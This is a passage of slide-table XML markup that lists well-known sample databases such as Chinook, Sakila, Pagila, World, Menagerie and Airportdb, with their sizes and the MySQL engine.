                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="316675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Music collection</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Chinook</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1.7Mb</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DVD rental store</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Sakila</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3.19 MB</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>mployee data</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Employee data</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>orld database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>World database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="485775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>M</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>enagerie database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Menagerie database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>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000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="485775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Airportdb database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>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000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId10">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Airportdb database</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                      </a:endParaRPr>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000" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>View</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>625 MB</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="323825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DVD rental store</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="6AA84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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12">
                            <a:extLst>
                              <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                                <ahyp:hlinkClr val="tx"/>
                              </a:ext>
                            </a:extLst>
                          </a:hlinkClick>
                        </a:rPr>
                        <a:t>Pagila</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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b="1" sz="10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1000">
